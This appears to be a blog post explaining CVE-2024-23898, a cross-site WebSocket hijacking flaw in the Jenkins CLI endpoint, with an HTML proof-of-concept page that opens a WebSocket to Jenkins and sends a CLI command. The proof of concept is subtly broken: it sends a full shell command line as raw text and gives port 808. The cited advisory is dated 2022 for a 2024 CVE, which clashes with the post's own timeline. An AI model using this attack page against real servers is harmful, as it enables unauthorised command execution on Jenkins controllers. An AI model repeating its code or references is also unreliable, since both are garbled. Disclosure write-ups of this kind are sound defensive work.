CVE-2024-23898: Jenkins Cross-Site WebSocket Hijacking (CSWSH) Vulnerability in CLI WebSocket Endpoint

In this post, we will discuss the details of a critical vulnerability affecting Jenkins, a widely-used open-source automation server. The vulnerability, labeled as CVE-2024-23898, impacts Jenkins versions 2.217 through 2.441 (both inclusive) and LTS 2.222.1 through 2.426.2 (both inclusive). The issue arises from the lack of origin validation of requests made through the CLI WebSocket endpoint, enabling attackers to execute CLI commands on the Jenkins controller.

Technical Background of the Vulnerability

Jenkins provides a command-line interface (CLI) to allow users to perform various administrative tasks. The CLI utilizes a WebSocket connection, which is vulnerable to Cross-Site WebSocket Hijacking (CSWSH) attacks. The underlying problem lies in Jenkins failing to properly validate incoming requests' origin.

Exploit Details

An attacker can create a malicious web page that forces victims to open a WebSocket connection to Jenkins without their consent. Since the browser's Same-Origin Policy does not apply to WebSocket connections, an attacker can use this malicious page to send CLI commands through the WebSocket connection to exploit Jenkins.

The malicious page establishes a WebSocket connection to the Jenkins server,

- The attacker sends CLI commands through the WebSocket connection to execute them on the Jenkins controller.

Code Snippet

Here's an example of a malicious web page that establishes a WebSocket connection to Jenkins and sends a CLI command:

<!DOCTYPE html>
<html>
<head>
  <script>
    window.onload = function() {
      // Change this URL to the Jenkins instance URL and WebSocket endpoint
      var ws_url = "ws://jenkins.example.com/cli/ws";
      var ws = new WebSocket(ws_url);
      ws.onopen = function() {
        // Sample Jenkins CLI command to get system information
        var command = "java -jar jenkins-cli.jar -s http://localhost:808/ -webSocket who-am-i";
        ws.send(command);
      };
      ws.onmessage = function(event) {        
        console.log("Received from Jenkins:", event.data);
      };
    };
  </script>
</head>
<body>
  <h1>Malicious Web Page</h1>
</body>
</html>

For Jenkins LTS (long-term support) users, please upgrade to Jenkins 2.426.3 or newer.

Additionally, always be cautious when browsing websites, especially those with unknown origins, as an attacker can host a malicious web page to exploit the vulnerability.

Original References

- Jenkins Security Advisory 2022-01-18: https://www.jenkins.io/security/advisory/2022-01-18/
- Jenkins Issue Tracker (JENKINS-67465): https://issues.jenkins.io/browse/JENKINS-67465
- NVD (National Vulnerability Database) CVE-2024-23898: https://nvd.nist.gov/vuln/detail/CVE-2024-23898

In conclusion, the Jenkins CLI WebSocket endpoint's lack of origin validation leads to the Cross-Site WebSocket Hijacking (CSWSH) vulnerability (CVE-2024-23898). Attackers can exploit this issue to execute CLI commands on the Jenkins controller. To protect your Jenkins instance from this vulnerability, it is essential to update to the latest version and follow secure browsing practices.

Timeline

Published on: 01/24/2024 18:15:09 UTC
Last modified on: 02/29/2024 11:15:08 UTC